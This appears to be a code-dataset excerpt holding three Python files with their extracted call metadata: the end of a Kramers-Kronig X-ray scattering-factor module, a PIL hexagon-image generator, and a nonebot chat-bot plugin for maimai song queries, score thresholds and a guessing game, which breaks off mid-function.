(You can calculate the value using the `calc_relativistic_correction` function.)
tolerance : float
Level of error in linear extrapolation of data values to be allowed.
recursion : integer
Number of times an energy interval can be halved before giving up.
Returns
-------
This function returns a numpy array with three columns respectively representing photon energy, the real spectrum and the imaginary spectrum.
"""
logger.debug("Improve data accuracy")
new_points = numpy.cumsum(numpy.ones((len(Full_E)-2,1),dtype=numpy.int8))+1
Im_values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1])))
#plot_Im_values = Im_values
Re_values = Real_Spectrum
E_values = Full_E
temp_Im_spectrum = Imaginary_Spectrum[1:]
count = 0
improved = 1
total_improved_points = 0
while count<recursion and numpy.sum(improved)>0:
#get E_midpoints
midpoints = (E_values[new_points-1]+E_values[new_points])/2.
#evaluate at new points
Im_midpoints = data.coeffs_to_ASF(midpoints, temp_Im_spectrum)
Re_midpoints = KK_PP(midpoints, Full_E, Imaginary_Spectrum, relativistic_correction)
#evaluate error levels
Im_error = abs((Im_values[new_points-1]+Im_values[new_points])/2. - Im_midpoints)
Re_error = abs((Re_values[new_points-1]+Re_values[new_points])/2. - Re_midpoints)
improved = (Im_error>tolerance) | (Re_error>tolerance)
logger.debug(str(numpy.sum(improved))+" points (out of "+str(len(improved))+") can be improved in pass number "+str(count+1)+".")
total_improved_points += numpy.sum(improved)
#insert new points and values
Im_values = numpy.insert(Im_values,new_points[improved],Im_midpoints[improved])
Re_values = numpy.insert(Re_values,new_points[improved],Re_midpoints[improved])
E_values = numpy.insert(E_values,new_points[improved],midpoints[improved])
#prepare for next loop
temp_Im_spectrum =numpy.repeat(temp_Im_spectrum[improved],2,axis=0)
new_points = numpy.where(numpy.insert(numpy.zeros(Im_values.shape, dtype=numpy.bool),new_points[improved],True))[0]
new_points = numpy.vstack((new_points, new_points+1)).T.flatten()
count += 1
#import matplotlib
#matplotlib.use('WXAgg')
#import pylab
#pylab.figure()
#pylab.plot(Full_E,plot_Im_values,'ok')
#pylab.plot(Full_E,Real_Spectrum,'og')
#pylab.plot(midpoints,Im_midpoints,'+b')
#pylab.plot(midpoints,Re_midpoints,'+r')
#pylab.plot(E_values,Im_values,'b-')
#pylab.plot(E_values,Re_values,'r-')
#pylab.plot(midpoints,Im_error,'b-')
#pylab.plot(midpoints,Re_error,'r-')
#pylab.xscale('log')
#pylab.show()
logger.info("Improved data accuracy by inserting "+str(total_improved_points)+" extra points.")
return numpy.vstack((E_values,Re_values,Im_values)).T
def kk_calculate_real(NearEdgeDataFile, ChemicalFormula, load_options=None, input_data_type=None, merge_points=None, add_background=False, fix_distortions=False, curve_tolerance=None, curve_recursion=50):
"""Do all data loading and processing and then calculate the kramers-Kronig transform.
Parameters
----------
NearEdgeDataFile : string
Path to file containg near-edge data
ChemicalFormula : string
A standard chemical formula string consisting of element symbols, numbers and parentheses.
merge_points : list or tuple pair of `float` values, or None
The photon energy values (low, high) at which the near-edge and scattering factor data values
are set equal so as to ensure continuity of the merged data set.
Returns
-------
This function returns a numpy array with columns consisting of the photon energy, the real and the imaginary parts of the scattering factors.
"""
Stoichiometry = data.ParseChemicalFormula(ChemicalFormula)
Relativistic_Correction = calc_relativistic_correction(Stoichiometry)
Full_E, Imaginary_Spectrum = data.calculate_asf(Stoichiometry)
if NearEdgeDataFile is not None:
NearEdge_Data = data.convert_data(data.load_data(NearEdgeDataFile, load_options),FromType=input_data_type,ToType='asf')
Full_E, Imaginary_Spectrum = data.merge_spectra(NearEdge_Data, Full_E, Imaginary_Spectrum, merge_points=merge_points, add_background=add_background, fix_distortions=fix_distortions)
Real_Spectrum = KK_PP(Full_E, Full_E, Imaginary_Spectrum, Relativistic_Correction)
if curve_tolerance is not None:
output_data = improve_accuracy(Full_E,Real_Spectrum,Imaginary_Spectrum, Relativistic_Correction, curve_tolerance, curve_recursion)
else:
Imaginary_Spectrum_Values = data.coeffs_to_ASF(Full_E, numpy.vstack((Imaginary_Spectrum,Imaginary_Spectrum[-1])))
output_data = numpy.vstack((Full_E,Real_Spectrum,Imaginary_Spectrum_Values)).T
return output_data
if __name__ == '__main__':
#use argparse here to get command line arguments
#process arguments and pass to a pythonic function
#I will abuse this section of code for initial testing
#Output = kk_calculate_real('../../data/Xy_norm_bgsub.txt', 'C10SH14', input_data_type='NEXAFS')
Output = kk_calculate_real('../../data/LaAlO3/LaAlO3_Exp.csv', 'LaAlO3', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05)
#Output = kk_calculate_real('../../data/GaAs/As.xmu.csv', 'GaAs', input_data_type='NEXAFS', fix_distortions=True, curve_tolerance=0.05)
Stoichiometry = data.ParseChemicalFormula('LaAlO3')
#Stoichiometry = data.ParseChemicalFormula('GaAs')
Relativistic_Correction = calc_relativistic_correction(Stoichiometry)
ASF_E, ASF_Data = data.calculate_asf(Stoichiometry)
ASF_Data3 = data.coeffs_to_linear(ASF_E, ASF_Data, 0.1)
ASF_Data2 = data.coeffs_to_ASF(ASF_E, numpy.vstack((ASF_Data,ASF_Data[-1])))
#Test_E = (Output[1:,0]+Output[0:-1,0])*0.5
#Test_E = numpy.linspace(41257.87,41259.87,num=21)
#Real_Spectrum2 = KK_PP(Test_E, Output[:,0], Im, Relativistic_Correction)
import matplotlib
matplotlib.use('WXAgg')
import pylab
pylab.figure()
pylab.plot(Output[:,0],Output[:,1],'xg-',Output[:,0],Output[:,2],'xb-')
pylab.plot(ASF_E,ASF_Data2,'+r')
#pylab.plot(ASF_E,ASF_Data22,'xr')
pylab.plot(ASF_Data3[0],ASF_Data3[1],'r-')
#pylab.plot(Test_E,Real_Spectrum2,'*y')
pylab.xscale('log')
pylab.show()
| [((14, 9, 14, 36), 'logging.getLogger', 'logging.getLogger', ({(14, 27, 14, 35): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((16, 1, 16, 41), 'logging.basicConfig', 'logging.basicConfig', (), '', False, 'import logging, sys\n'), ((17, 1, 17, 41), 'logging.StreamHandler', 'logging.StreamHandler', (), '', False, 'import logging, sys\n'), ((68, 10, 68, 37), 'logging.getLogger', 'logging.getLogger', ({(68, 28, 68, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((80, 4, 80, 25), 'numpy.any', 'numpy.any', ({(80, 14, 80, 24): '(orders <= -2)'}, {}), '(orders <= -2)', False, 'import numpy\n'), ((84, 4, 84, 24), 'numpy.any', 'numpy.any', ({(84, 14, 84, 23): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((91, 4, 91, 26), 'numpy.any', 'numpy.any', ({(91, 14, 91, 25): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((122, 10, 122, 37), 'logging.getLogger', 'logging.getLogger', ({(122, 28, 122, 36): '__name__'}, {}), '(__name__)', False, 'import logging, sys\n'), ((131, 10, 131, 53), 'numpy.sum', 'numpy.sum', (), '', False, 'import numpy\n'), ((135, 13, 135, 36), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((236, 17, 236, 59), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(236, 43, 236, 58): 'ChemicalFormula'}, {}), '(ChemicalFormula)', False, 'import data\n'), ((238, 30, 238, 63), 'data.calculate_asf', 'data.calculate_asf', ({(238, 49, 238, 62): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((259, 17, 259, 52), 'data.ParseChemicalFormula', 'data.ParseChemicalFormula', ({(259, 43, 259, 51): '"""LaAlO3"""'}, {}), "('LaAlO3')", False, 'import data\n'), ((262, 19, 262, 52), 'data.calculate_asf', 'data.calculate_asf', ({(262, 38, 262, 51): 'Stoichiometry'}, {}), '(Stoichiometry)', False, 'import data\n'), ((263, 13, 263, 56), 'data.coeffs_to_linear', 'data.coeffs_to_linear', ({(263, 35, 263, 40): 'ASF_E', (263, 42, 263, 50): 'ASF_Data', (263, 52, 263, 55): '0.1'}, {}), '(ASF_E, ASF_Data, 0.1)', False, 'import data\n'), ((272, 1, 272, 24), 'matplotlib.use', 'matplotlib.use', ({(272, 16, 272, 23): '"""WXAgg"""'}, {}), "('WXAgg')", False, 'import matplotlib\n'), ((275, 1, 275, 15), 'pylab.figure', 'pylab.figure', ({}, {}), '()', False, 'import pylab\n'), ((276, 1, 276, 72), 'pylab.plot', 'pylab.plot', ({(276, 12, 276, 23): 'Output[:, (0)]', (276, 24, 276, 35): 'Output[:, (1)]', (276, 36, 276, 41): '"""xg-"""', (276, 42, 276, 53): 'Output[:, (0)]', (276, 54, 276, 65): 'Output[:, (2)]', (276, 66, 276, 71): '"""xb-"""'}, {}), "(Output[:, (0)], Output[:, (1)], 'xg-', Output[:, (0)], Output[:,\n (2)], 'xb-')", False, 'import pylab\n'), ((277, 1, 277, 33), 'pylab.plot', 'pylab.plot', ({(277, 12, 277, 17): 'ASF_E', (277, 18, 277, 27): 'ASF_Data2', (277, 28, 277, 32): '"""+r"""'}, {}), "(ASF_E, ASF_Data2, '+r')", False, 'import pylab\n'), ((279, 1, 279, 43), 'pylab.plot', 'pylab.plot', ({(279, 12, 279, 24): 'ASF_Data3[0]', (279, 25, 279, 37): 'ASF_Data3[1]', (279, 38, 279, 42): '"""r-"""'}, {}), "(ASF_Data3[0], ASF_Data3[1], 'r-')", False, 'import pylab\n'), ((281, 1, 281, 20), 'pylab.xscale', 'pylab.xscale', ({(281, 14, 281, 19): '"""log"""'}, {}), "('log')", False, 'import pylab\n'), ((282, 1, 282, 13), 'pylab.show', 'pylab.show', ({}, {}), '()', False, 'import pylab\n'), ((173, 40, 173, 97), 'numpy.vstack', 'numpy.vstack', ({(173, 53, 173, 96): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((185, 17, 185, 64), 'data.coeffs_to_ASF', 'data.coeffs_to_ASF', ({(185, 36, 185, 45): 'midpoints', (185, 47, 185, 63): 'temp_Im_spectrum'}, {}), '(midpoints, temp_Im_spectrum)', False, 'import data\n'), ((192, 27, 192, 46), 'numpy.sum', 'numpy.sum', ({(192, 37, 192, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((194, 14, 194, 81), 'numpy.insert', 'numpy.insert', ({(194, 27, 194, 36): 'Im_values', (194, 37, 194, 57): 'new_points[improved]', (194, 58, 194, 80): 'Im_midpoints[improved]'}, {}), '(Im_values, new_points[improved], Im_midpoints[improved])', False, 'import numpy\n'), ((195, 14, 195, 81), 'numpy.insert', 'numpy.insert', ({(195, 27, 195, 36): 'Re_values', (195, 37, 195, 57): 'new_points[improved]', (195, 58, 195, 80): 'Re_midpoints[improved]'}, {}), '(Re_values, new_points[improved], Re_midpoints[improved])', False, 'import numpy\n'), ((196, 13, 196, 76), 'numpy.insert', 'numpy.insert', ({(196, 26, 196, 34): 'E_values', (196, 35, 196, 55): 'new_points[improved]', (196, 56, 196, 75): 'midpoints[improved]'}, {}), '(E_values, new_points[improved], midpoints[improved])', False, 'import numpy\n'), ((198, 20, 198, 69), 'numpy.repeat', 'numpy.repeat', (), '', False, 'import numpy\n'), ((218, 8, 218, 52), 'numpy.vstack', 'numpy.vstack', ({(218, 21, 218, 51): '(E_values, Re_values, Im_values)'}, {}), '((E_values, Re_values, Im_values))', False, 'import numpy\n'), ((241, 31, 241, 183), 'data.merge_spectra', 'data.merge_spectra', (), '', False, 'import data\n'), ((264, 39, 264, 76), 'numpy.vstack', 'numpy.vstack', ({(264, 52, 264, 75): '(ASF_Data, ASF_Data[-1])'}, {}), '((ASF_Data, ASF_Data[-1]))', False, 'import numpy\n'), ((85, 12, 85, 34), 'numpy.where', 'numpy.where', ({(85, 24, 85, 33): '(orders >= 0)'}, {}), '(orders >= 0)', False, 'import numpy\n'), ((92, 12, 92, 35), 'numpy.where', 'numpy.where', ({(92, 24, 92, 34): '(orders <= -3)'}, {}), '(orders <= -3)', False, 'import numpy\n'), ((130, 155, 130, 204), 'numpy.absolute', 'numpy.absolute', ({(130, 170, 130, 203): '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))'}, {}), '((X2 - E + 1 * (X2 == E)) / (X1 - E + 1 * (X1 == E)))', False, 'import numpy\n'), ((134, 36, 134, 59), 'numpy.any', 'numpy.any', (), '', False, 'import numpy\n'), ((142, 113, 142, 144), 'numpy.absolute', 'numpy.absolute', ({(142, 128, 142, 143): '((X2 - XE) / (X1 - XE))'}, {}), '((X2 - XE) / (X1 - XE))', False, 'import numpy\n'), ((181, 27, 181, 46), 'numpy.sum', 'numpy.sum', ({(181, 37, 181, 45): 'improved'}, {}), '(improved)', False, 'import numpy\n'), ((240, 36, 240, 82), 'data.load_data', 'data.load_data', ({(240, 51, 240, 67): 'NearEdgeDataFile', (240, 69, 240, 81): 'load_options'}, {}), '(NearEdgeDataFile, load_options)', False, 'import data\n'), ((246, 57, 246, 114), 'numpy.vstack', 'numpy.vstack', ({(246, 70, 246, 113): '(Imaginary_Spectrum, Imaginary_Spectrum[-1])'}, {}), '((Imaginary_Spectrum, Imaginary_Spectrum[-1]))', False, 'import numpy\n'), ((247, 16, 247, 78), 'numpy.vstack', 'numpy.vstack', ({(247, 29, 247, 77): '(Full_E, Real_Spectrum, Imaginary_Spectrum_Values)'}, {}), '((Full_E, Real_Spectrum, Imaginary_Spectrum_Values))', False, 'import numpy\n'), ((129, 333, 129, 362), 'numpy.absolute', 'numpy.absolute', ({(129, 348, 129, 361): '((X2 + E) / (X1 + E))'}, {}), '((X2 + E) / (X1 + E))', False, 'import numpy\n'), ((78, 43, 78, 87), 'numpy.absolute', 'numpy.absolute', ({(78, 58, 78, 86): '(X[1:, :, :] + E) / (X[:-1, :, :] + E)'}, {}), '((X[1:, :, :] + E) / (X[:-1, :, :] + E))', False, 'import numpy\n'), ((82, 66, 82, 124), 'numpy.absolute', 'numpy.absolute', ({(82, 81, 82, 123): '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])'}, {}), '(X[1:, :, (orders <= -2)] / X[:-1, :, (orders <= -2)])', False, 'import numpy\n'), ((128, 152, 128, 173), 'numpy.absolute', 'numpy.absolute', ({(128, 167, 128, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((199, 40, 199, 86), 'numpy.zeros', 'numpy.zeros', (), '', False, 'import numpy\n'), ((200, 15, 200, 55), 'numpy.vstack', 'numpy.vstack', ({(200, 28, 200, 54): '(new_points, new_points + 1)'}, {}), '((new_points, new_points + 1))', False, 'import numpy\n'), ((129, 152, 129, 173), 'numpy.absolute', 'numpy.absolute', ({(129, 167, 129, 172): '(X2 / X1)'}, {}), '(X2 / X1)', False, 'import numpy\n'), ((191, 19, 191, 38), 'numpy.sum', 'numpy.sum', ({(191, 29, 191, 37): 'improved'}, {}), '(improved)', False, 'import numpy\n')] |
dominicschaff/random | random-images/hexxy.py | 14a19b976a09c768ab8844b7cda237c17a92c9ae | from PIL import ImageDraw, Image
from math import cos,sin,radians
from random import randint
import sys
a = "a0A1b2B3c4C5d6D7e8E9f!F,g.G/h?H<i>I:j;J'k\"K\\l|L/m M\nn\tN@o#O$p%P^q&Q*r(R)s_S-t+T=u{U}v[V]w W x X y Y z Z"
if len(a) > 128:
print("TOO MANY CHARACTERS")
sys.exit(1)
# for i in a:
# print("%s -> %d %d %d %d %d %d %d "%(i,
# 1 if a.index(i) & 1 == 1 else 0,
# 1 if a.index(i) & 2 == 2 else 0,
# 1 if a.index(i) & 4 == 4 else 0,
# 1 if a.index(i) & 8 == 8 else 0,
# 1 if a.index(i) & 16 == 16 else 0,
# 1 if a.index(i) & 32 == 32 else 0,
# 1 if a.index(i) & 64 == 64 else 0,
# ))
# sys.exit(0)
WHITE=(255,255,255)
PINK=(217,154,197)
BLUE=(103,170,249)
BLACK=(0,0,0)
img = Image.new('RGB', (2560,1600), BLACK)
id = ImageDraw.Draw(img)
def hex(offset, size):
points = []
x,y = offset
for angle in range(0, 360, 60):
x += cos(radians(angle)) * size
y += sin(radians(angle)) * size
points.append((x, y))
return points
def drawHex(id, sx,sy,s,c):
ox = sx - cos(radians(120)) * s
oy = sy - sin(radians(120)) * s
id.polygon(hex((ox-s,oy-s*2),s), fill=BLUE if c & 1 == 1 else PINK)
id.polygon(hex((ox+s,oy-s*2),s), fill=BLUE if c & 2 == 2 else PINK)
id.polygon(hex((ox-s*2,oy),s), fill=BLUE if c & 4 == 4 else PINK)
id.polygon(hex((ox,oy),s), fill=BLUE if c & 8 == 8 else PINK)
id.polygon(hex((ox+s*2,oy),s), fill=BLUE if c & 16 == 16 else PINK)
id.polygon(hex((ox-s,oy+s*2),s), fill=BLUE if c & 32 == 32 else PINK)
id.polygon(hex((ox+s,oy+s*2),s), fill=BLUE if c & 64 == 64 else PINK)
q = """This is a test
0123456789%"""
s = 10
cutOff = int(2560/(s*7))
print (cutOff)
x,y = 0,0
for c in q:
drawHex(id, s*2 + x*s*7, s*3 + y*s*7, s, a.index(c))
x+=1
if x >= cutOff or c == "\n":
x,y = 0,y+1
img.show() | [((28, 6, 28, 42), 'PIL.Image.new', 'Image.new', ({(28, 16, 28, 21): '"""RGB"""', (28, 23, 28, 34): '(2560, 1600)', (28, 36, 28, 41): 'BLACK'}, {}), "('RGB', (2560, 1600), BLACK)", False, 'from PIL import ImageDraw, Image\n'), ((29, 5, 29, 24), 'PIL.ImageDraw.Draw', 'ImageDraw.Draw', ({(29, 20, 29, 23): 'img'}, {}), '(img)', False, 'from PIL import ImageDraw, Image\n'), ((9, 4, 9, 15), 'sys.exit', 'sys.exit', ({(9, 13, 9, 14): '(1)'}, {}), '(1)', False, 'import sys\n'), ((36, 17, 36, 31), 'math.radians', 'radians', ({(36, 25, 36, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((37, 17, 37, 31), 'math.radians', 'radians', ({(37, 25, 37, 30): 'angle'}, {}), '(angle)', False, 'from math import cos, sin, radians\n'), ((42, 18, 42, 30), 'math.radians', 'radians', ({(42, 26, 42, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n'), ((43, 18, 43, 30), 'math.radians', 'radians', ({(43, 26, 43, 29): '(120)'}, {}), '(120)', False, 'from math import cos, sin, radians\n')] |
LonelyFantasy/Chiyuki-Bot | src/plugins/maimaidx.py | 16a91b96661825c2a367a12c30d6a28ad13b95a9 | import math
from collections import defaultdict
from typing import List, Dict, Any
from nonebot import on_command, on_message, on_notice, on_regex, get_driver
from nonebot.log import logger
from nonebot.permission import Permission
from nonebot.typing import T_State
from nonebot.adapters import Event, Bot
from nonebot.adapters.cqhttp import Message, MessageSegment, GroupMessageEvent, PrivateMessageEvent
from src.libraries.maimaidx_guess import GuessObject
from src.libraries.tool import hash
from src.libraries.maimaidx_music import *
from src.libraries.image import *
from src.libraries.maimai_best_40 import generate
import requests
import json
import random
import time
import re
from urllib import parse
driver = get_driver()
@driver.on_startup
def _():
logger.info("Load help text successfully")
help_text: dict = get_driver().config.help_text
help_text['mai'] = ('查看舞萌相关功能', """桜千雪です、よろしく。
可用命令如下:
今日舞萌 查看今天的舞萌运势
XXXmaimaiXXX什么 随机一首歌
随个[dx/标准][绿黄红紫白]<难度> 随机一首指定条件的乐曲
查歌<乐曲标题的一部分> 查询符合条件的乐曲
[绿黄红紫白]id<歌曲编号> 查询乐曲信息或谱面信息
<歌曲别名>是什么歌 查询乐曲别名对应的乐曲
定数查歌 <定数> 查询定数对应的乐曲
定数查歌 <定数下限> <定数上限>
分数线 <难度+歌曲id> <分数线> 详情请输入“分数线 帮助”查看""")
def song_txt(music: Music):
return Message([
{
"type": "text",
"data": {
"text": f"{music.id}. {music.title}\n"
}
},
{
"type": "image",
"data": {
"file": f"https://www.diving-fish.com/covers/{music.id}.jpg"
}
},
{
"type": "text",
"data": {
"text": f"\n{'/'.join(music.level)}"
}
}
])
def inner_level_q(ds1, ds2=None):
result_set = []
diff_label = ['Bas', 'Adv', 'Exp', 'Mst', 'ReM']
if ds2 is not None:
music_data = total_list.filter(ds=(ds1, ds2))
else:
music_data = total_list.filter(ds=ds1)
for music in music_data:
for i in music.diff:
result_set.append((music['id'], music['title'], music['ds'][i], diff_label[i], music['level'][i]))
return result_set
inner_level = on_command('inner_level ', aliases={'定数查歌 '})
@inner_level.handle()
async def _(bot: Bot, event: Event, state: T_State):
argv = str(event.get_message()).strip().split(" ")
if len(argv) > 2 or len(argv) == 0:
await inner_level.finish("命令格式为\n定数查歌 <定数>\n定数查歌 <定数下限> <定数上限>")
return
if len(argv) == 1:
result_set = inner_level_q(float(argv[0]))
else:
result_set = inner_level_q(float(argv[0]), float(argv[1]))
if len(result_set) > 50:
await inner_level.finish("数据超出 50 条,请尝试缩小查询范围")
return
s = ""
for elem in result_set:
s += f"{elem[0]}. {elem[1]} {elem[3]} {elem[4]}({elem[2]})\n"
await inner_level.finish(s.strip())
spec_rand = on_regex(r"^随个(?:dx|sd|标准)?[绿黄红紫白]?[0-9]+\+?")
@spec_rand.handle()
async def _(bot: Bot, event: Event, state: T_State):
level_labels = ['绿', '黄', '红', '紫', '白']
regex = "随个((?:dx|sd|标准))?([绿黄红紫白]?)([0-9]+\+?)"
res = re.match(regex, str(event.get_message()).lower())
try:
if res.groups()[0] == "dx":
tp = ["DX"]
elif res.groups()[0] == "sd" or res.groups()[0] == "标准":
tp = ["SD"]
else:
tp = ["SD", "DX"]
level = res.groups()[2]
if res.groups()[1] == "":
music_data = total_list.filter(level=level, type=tp)
else:
music_data = total_list.filter(level=level, diff=['绿黄红紫白'.index(res.groups()[1])], type=tp)
await spec_rand.send(song_txt(music_data.random()))
except Exception as e:
print(e)
await spec_rand.finish("随机命令错误,请检查语法")
mr = on_regex(r".*maimai.*什么")
@mr.handle()
async def _(bot: Bot, event: Event, state: T_State):
await mr.finish(song_txt(total_list.random()))
search_music = on_regex(r"^查歌.+")
@search_music.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "查歌(.+)"
name = re.match(regex, str(event.get_message())).groups()[0].strip()
if name == "":
return
res = total_list.filter(title_search=name)
await search_music.finish(Message([
{"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}} for music in res]))
query_chart = on_regex(r"^([绿黄红紫白]?)id([0-9]+)")
@query_chart.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "([绿黄红紫白]?)id([0-9]+)"
groups = re.match(regex, str(event.get_message())).groups()
level_labels = ['绿', '黄', '红', '紫', '白']
if groups[0] != "":
try:
level_index = level_labels.index(groups[0])
level_name = ['Basic', 'Advanced', 'Expert', 'Master', 'Re: MASTER']
name = groups[1]
music = total_list.by_id(name)
chart = music['charts'][level_index]
ds = music['ds'][level_index]
level = music['level'][level_index]
file = f"https://www.diving-fish.com/covers/{music['id']}.jpg"
if len(chart['notes']) == 4:
msg = f'''{level_name[level_index]} {level}({ds})
TAP: {chart['notes'][0]}
HOLD: {chart['notes'][1]}
SLIDE: {chart['notes'][2]}
BREAK: {chart['notes'][3]}
谱师: {chart['charter']}
'''
else:
msg = f'''{level_name[level_index]} {level}({ds})
TAP: {chart['notes'][0]}
HOLD: {chart['notes'][1]}
SLIDE: {chart['notes'][2]}
TOUCH: {chart['notes'][3]}
BREAK: {chart['notes'][4]}
谱师: {chart['charter']}
'''
await query_chart.send(Message([
{
"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}
},
{
"type": "image",
"data": {
"file": f"{file}"
}
},
{
"type": "text",
"data": {
"text": msg
}
}
]))
except Exception:
await query_chart.send("未找到该谱面")
else:
name = groups[1]
music = total_list.by_id(name)
try:
file = f"https://www.diving-fish.com/covers/{music['id']}.jpg"
await query_chart.send(Message([
{
"type": "text",
"data": {
"text": f"{music['id']}. {music['title']}\n"
}
},
{
"type": "image",
"data": {
"file": f"{file}"
}
},
{
"type": "text",
"data": {
"text": f"艺术家: {music['basic_info']['artist']}\n分类: {music['basic_info']['genre']}\nBPM: {music['basic_info']['bpm']}\n版本: {music['basic_info']['from']}\n难度: {'/'.join(music['level'])}"
}
}
]))
except Exception:
await query_chart.send("未找到该乐曲")
wm_list = ['拼机', '推分', '越级', '下埋', '夜勤', '练底力', '练手法', '打旧框', '干饭', '抓绝赞', '收歌']
jrwm = on_command('今日舞萌', aliases={'今日mai'})
@jrwm.handle()
async def _(bot: Bot, event: Event, state: T_State):
qq = int(event.get_user_id())
h2 = hash(qq)
h = h2
rp = h % 100
wm_value = []
for i in range(11):
wm_value.append(h & 3)
h >>= 2
s = f"今日人品值:{rp}\n"
for i in range(11):
if wm_value[i] == 3:
s += f'宜 {wm_list[i]}\n'
elif wm_value[i] == 0:
s += f'忌 {wm_list[i]}\n'
s += "千雪提醒您:打机时不要大力拍打或滑动哦\n今日推荐歌曲:"
music = total_list[h2 % len(total_list)]
await jrwm.finish(Message([
{"type": "text", "data": {"text": s}}
] + song_txt(music)))
music_aliases = defaultdict(list)
f = open('src/static/aliases.csv', 'r', encoding='utf-8')
tmp = f.readlines()
f.close()
for t in tmp:
arr = t.strip().split('\t')
for i in range(len(arr)):
if arr[i] != "":
music_aliases[arr[i].lower()].append(arr[0])
find_song = on_regex(r".+是什么歌")
@find_song.handle()
async def _(bot: Bot, event: Event, state: T_State):
regex = "(.+)是什么歌"
name = re.match(regex, str(event.get_message())).groups()[0].strip().lower()
if name not in music_aliases:
await find_song.finish("未找到此歌曲\n舞萌 DX 歌曲别名收集计划:https://docs.qq.com/sheet/DSXhaUXVsRlhxRmtJ")
return
result_set = music_aliases[name]
if len(result_set) == 1:
music = total_list.by_title(result_set[0])
await find_song.finish(Message([{"type": "text", "data": {"text": "您要找的是不是"}}] + song_txt(music)))
else:
s = '\n'.join(result_set)
await find_song.finish(f"您要找的可能是以下歌曲中的其中一首:\n{ s }")
query_score = on_command('分数线')
query_score_text = '''此功能为查找某首歌分数线设计。
命令格式:分数线 <难度+歌曲id> <分数线>
例如:分数线 白337 100
命令将返回分数线允许的 TAP GREAT 容错以及 BREAK 50落等价的 TAP GREAT 数。
以下为 TAP GREAT 的对应表:
GREAT/GOOD/MISS
TAP 1/2.5/5
HOLD 2/5/10
SLIDE 3/7.5/15
TOUCH 1/2.5/5
BREAK 5/12.5/25(外加200落)'''
query_score_mes = Message([{
"type": "image",
"data": {
"file": f"base64://{str(image_to_base64(text_to_image(query_score_text)), encoding='utf-8')}"
}
}])
@query_score.handle()
async def _(bot: Bot, event: Event, state: T_State):
r = "([绿黄红紫白])(?:id)?([0-9]+)"
argv = str(event.get_message()).strip().split(" ")
if len(argv) == 1 and argv[0] == '帮助':
await query_score.send(query_score_mes)
elif len(argv) == 2:
try:
grp = re.match(r, argv[0]).groups()
level_labels = ['绿', '黄', '红', '紫', '白']
level_labels2 = ['Basic', 'Advanced', 'Expert', 'Master', 'Re:MASTER']
level_index = level_labels.index(grp[0])
chart_id = grp[1]
line = float(argv[1])
music = total_list.by_id(chart_id)
chart: Dict[Any] = music['charts'][level_index]
tap = int(chart['notes'][0])
slide = int(chart['notes'][2])
hold = int(chart['notes'][1])
touch = int(chart['notes'][3]) if len(chart['notes']) == 5 else 0
brk = int(chart['notes'][-1])
total_score = 500 * tap + slide * 1500 + hold * 1000 + touch * 500 + brk * 2500
break_bonus = 0.01 / brk
break_50_reduce = total_score * break_bonus / 4
reduce = 101 - line
if reduce <= 0 or reduce >= 101:
raise ValueError
await query_chart.send(f'''{music['title']} {level_labels2[level_index]}
分数线 {line}% 允许的最多 TAP GREAT 数量为 {(total_score * reduce / 10000):.2f}(每个-{10000 / total_score:.4f}%),
BREAK 50落(一共{brk}个)等价于 {(break_50_reduce / 100):.3f} 个 TAP GREAT(-{break_50_reduce / total_score * 100:.4f}%)''')
except Exception:
await query_chart.send("格式错误或未找到乐曲,输入“分数线 帮助”以查看帮助信息")
best_40_pic = on_command('b40')
@best_40_pic.handle()
async def _(bot: Bot, event: Event, state: T_State):
username = str(event.get_message()).strip()
print(event.message_id)
if username == "":
payload = {'qq': str(event.get_user_id())}
else:
payload = {'username': username}
img, success = await generate(payload)
if success == 400:
await best_40_pic.send("未找到此玩家,请确保此玩家的用户名和查分器中的用户名相同。")
elif success == 403:
await best_40_pic.send("该用户禁止了其他人获取数据。")
else:
await best_40_pic.send(Message([
MessageSegment.reply(event.message_id),
MessageSegment.image(f"base64://{str(image_to_base64(img), encoding='utf-8')}")
]))
disable_guess_music = on_command('猜歌设置', priority=0)
@disable_guess_music.handle()
async def _(bot: Bot, event: Event):
if event.message_type != "group":
return
arg = str(event.get_message())
group_members = await bot.get_group_member_list(group_id=event.group_id)
for m in group_members:
if m['user_id'] == event.user_id:
break
su = get_driver().config.superusers
if m['role'] != 'owner' and m['role'] != 'admin' and str(m['user_id']) not in su:
await disable_guess_music.finish("只有管理员可以设置猜歌")
return
db = get_driver().config.db
c = await db.cursor()
if arg == '启用':
await c.execute(f'update guess_table set enabled=1 where group_id={event.group_id}')
elif arg == '禁用':
await c.execute(f'update guess_table set enabled=0 where group_id={event.group_id}')
else:
await disable_guess_music.finish("请输入 猜歌设置 启用/禁用")
await db.commit()
await disable_guess_music.finish("设置成功")
guess_dict: Dict[Tuple[str, str], GuessObject] = {}
guess_cd_dict: Dict[Tuple[str, str], float] = {}
guess_music = on_command('猜歌', priority=0)
async def guess_music_loop(bot: Bot, event: Event, state: T_State):
await asyncio.sleep(10)
guess: GuessObject = state["guess_object"]
if guess.is_end:
return
cycle = state["cycle"]
if cycle < 6:
asyncio.create_task(bot.send(event, f"{cycle + 1}/7 这首歌" + guess.guess_options[cycle]))
else:
asyncio.create_task(bot.send(event, Message([
MessageSegment.text("7/7 这首歌封面的一部分是:"),
MessageSegment.image("base64://" + str(guess.b64image, encoding="utf-8")),
